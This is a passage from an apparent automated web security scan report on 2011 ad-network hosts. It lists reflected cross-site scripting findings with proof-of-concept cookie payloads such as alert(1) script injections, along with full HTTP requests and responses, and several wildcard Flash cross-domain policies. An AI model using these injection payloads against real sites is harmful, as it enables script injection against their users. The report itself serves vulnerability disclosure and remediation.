// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.159. http://ib.adnxs.com/acb [acb145072 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb145072 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50b6'%3balert(1)//f3c67e09f9f was submitted in the acb145072 cookie. This input was echoed as d50b6';alert(1)//f3c67e09f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb145072=5_[r^kI/7ZVO@Lm*bfY>AYR8I?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQNspbpGFnStGSsYda6b2ziUcCshNAAAAACgjBgA3AQAAHgAAAAMAAAAmSAUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAAfyE2KQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=113105%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26managed=falsed50b6'%3balert(1)//f3c67e09f9f; sess=1; icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:37:21 GMT
Content-Length: 2869

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=falsed50b6';alert(1)//f3c67e09f9f" width="1" height="1"/>
...[SNIP]...

2.160. http://ib.adnxs.com/acb [acb893170 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb893170 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e655b'%3balert(1)//a0760bdba82 was submitted in the acb893170 cookie. This input was echoed as e655b';alert(1)//a0760bdba82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2578662&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; acb893170=5_[r^kI/7ZVO@Lm*bfY>WiRT8?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQFOF0tqw0VJASsYda6b2ziViCshNAAAAACgjBgA3AQAAHgAAAAMAAACHbQUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAATCPKqQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=114297%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26managed=falsee655b'%3balert(1)//a0760bdba82; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb893170=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:39:01 GMT
Content-Length: 2748

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=114297&message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-&managed=falsee655b';alert(1)//a0760bdba82" width="1" height="1"/>
...[SNIP]...

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1063'%3balert(1)//73c0ac01910 was submitted in the cli cookie. This input was echoed as d1063';alert(1)//73c0ac01910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ed1063'%3balert(1)//73c0ac01910; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:05 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:05 GMT
Content-Length: 7736

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
t language="Javascript">CollectiveMedia.createAndAttachAd("cm-35414998_1304955425","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-35414998_1304955425,11f8f328940989ed1063';alert(1)//73c0ac01910&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-35414
...[SNIP]...

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2833e"><script>alert(1)</script>bf0f8f7e7b1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=2833e"><script>alert(1)</script>bf0f8f7e7b1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=12590^2&13549^1&5032^3; csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^4; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58951; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3164882.js^2^1304954981^1304955448&3187892.js^1^1304955417^1304955417&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:37:28 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1479

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2833e"><script>alert(1)</script>bf0f8f7e7b1" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 81 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:36:58 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.2. http://a1.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.3. http://action.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=703ddf34-92af-425c-9096-a1b12a71ff71; path=/; expires=Thu, 08-May-2014 15:39:14 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 09 May 2011 15:39:14 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.4. http://ad.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 19:27:14 GMT
Content-Type: text/xml
Content-Length: 302
Date: Mon, 09 May 2011 15:35:20 GMT
X-Varnish: 1625213256 1625133942
Age: 7680
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

3.5. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
